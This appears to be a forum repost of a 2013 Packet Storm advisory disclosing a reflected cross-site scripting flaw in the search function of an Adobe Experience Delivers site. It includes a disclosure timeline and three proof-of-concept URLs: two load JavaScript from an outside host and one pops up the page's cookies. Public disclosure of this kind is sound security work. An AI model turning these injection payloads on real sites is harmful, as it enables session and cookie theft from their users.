Praetorian503 Posted January 21, 2013 Report Share Posted January 21, 2013 Adobe Experience suffers from a reflected cross site scripting vulnerability. The author contacted Adobe back in August but the issue is still not resolved so they are releasing details in hopes that Adobe will address the issue. Note that this finding houses site-specific data.----------------------------------------------------------------------------------------------------Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerabilityVendor : Adobe Systems Incorporated (http://www.adobe.com)Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacksAdvisory time-line:----------------------------------------------------------------------------------------------------- Vendor PSIRT notified : 05-Aug-2012 - Vendor response : 05-Aug-2012. Ticket created. "Looking into it now".- Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012 Adobe PSIRT has not responded to any requests after 09-Nov-2012- Packet Storm advisory : 19-Jan-2013Test environment----------------------------------------------------------------------------------------------------- Latest Firefox browserDetails----------------------------------------------------------------------------------------------------Affected functionality: search functionTest #1: Remote Javascript execution: display browser cookiehttp://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8Test #2, Remote Javascript execution: overwrite HTML content - PoChttp://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8Test #3, Alert test with image-taghttp://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8Note: the Javascript test cases are not malicious.Researcher----------------------------------------------------------------------------------------------------Janne Ahlberg Twitter: https://twitter.com/JanneFIBlog: http://janne.isProject site: http://idash.net----------------------------------------------------------------------------------------------------Source: PacketStorm Quote Link to comment Share on other sites More sharing options...
